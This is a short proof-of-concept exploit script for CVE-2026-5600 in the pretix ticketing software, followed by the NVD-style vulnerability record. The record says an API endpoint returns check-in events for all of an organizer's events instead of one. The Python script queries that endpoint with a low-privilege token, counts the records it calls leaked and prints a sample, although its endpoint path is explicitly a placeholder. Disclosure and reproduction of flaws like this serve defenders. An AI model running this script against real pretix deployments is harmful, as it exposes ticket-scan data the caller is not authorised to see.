CVE-2026-5600

import requests # Target API endpoint (Conceptual URL based on vulnerability description) # The specific endpoint path introduced in pretix 2025 needs to be substituted here target_url = "https://target-pretix-instance/api/v1/organizers/{organizer_slug}/all_checkin_events/" # Authorization header with a low-privilege token for a specific event headers = { "Authorization": "Token <LOW_PRIVILEGE_API_TOKEN>", "Accept": "application/json" } def exploit_cve_2026_5600(organizer_slug): """ PoC to demonstrate information disclosure in pretix 2025. Attempts to retrieve all check-in events for the organizer. """ print(f"[*] Attempting to access all check-in events for organizer: {organizer_slug}") try: # Send request to the vulnerable endpoint response = requests.get(target_url.format(organizer_slug=organizer_slug), headers=headers) if response.status_code == 200: data = response.json() print("[+] Request successful. Data retrieved.") # Iterate through the results to verify data leakage results = data.get('results', []) print(f"[+] Total records leaked: {len(results)}") # Display a sample record structure if results: print("[+] Sample record structure:") print(results[0]) else: print("[-] No records found or empty response.") else: print(f"[-] Request failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] An error occurred: {str(e)}") # Example usage # exploit_cve_2026_5600("example-organizer")

{"cve": {"id": "CVE-2026-5600", "sourceIdentifier": "655498c3-6ec5-4f0b-aea6-853b334d05a6", "published": "2026-04-08T13:16:43.543", "lastModified": "2026-04-24T17:46:14.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A new API endpoint introduced in pretix 2025 that is supposed to \nreturn all check-in events of a specific event in fact returns all \ncheck-in events belonging to the respective organizer. This allows an \nAPI consumer to access information for all other events under the same \norganizer, even those they should not have access to.\n\n\nThese records contain information on the time and result of every ticket scan as well as the ID of the matched ticket. Example:\n\n\n{\n \"id\": 123,\n \"successful\": true,\n \"error_reason\": null,\n \"error_explanation\": null,\n \"position\": 321,\n \"datetime\": \"2020-08-23T09:00:00+02:00\",\n \"list\": 456,\n \"created\": \"2020-08-23T09:00:00+02:00\",\n \"auto_checked_in\": false,\n \"gate\": null,\n \"device\": 1,\n \"device_id\": 1,\n \"type\": \"entry\"\n}\n\n\n\nAn unauthorized user usually has no way to match these IDs (position) back to individual people."}], "metrics": {"cvssMetricV40": [{"source": "655498c3-6ec5-4f0b-aea6-853b334d05a6", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "655498c3-6ec5-4f0b-aea6-853b334d05a6", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-653"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.10.0", "versionEndExcluding": "2026.1.2", "matchCriteriaId": "467C4FAB-6446-4716-9C03-7AC9B72ECF58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:*", "versionStartIncluding": "2026.2.0", "versionEndExcluding": "2026.2.1", "matchCriteriaId": "7BFC10B5-5C62-4E2B-A387-9AB3F5A06F75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:*", "versionStartIncluding": "2026.3.0", "versionEndExcluding": "2026.3.1", "matchCriteriaId": "8DBC4AF8-B234-4ACB-BB04-06CC103DFF47"}]}]}], "references": [{"url": "https://pretix.eu/about/en/blog/20260408-release-2026-3-1/", "source": "655498c3-6ec5-4f0b-aea6-853b334d05a6", "tags": ["Vendor Advisory"]}]}}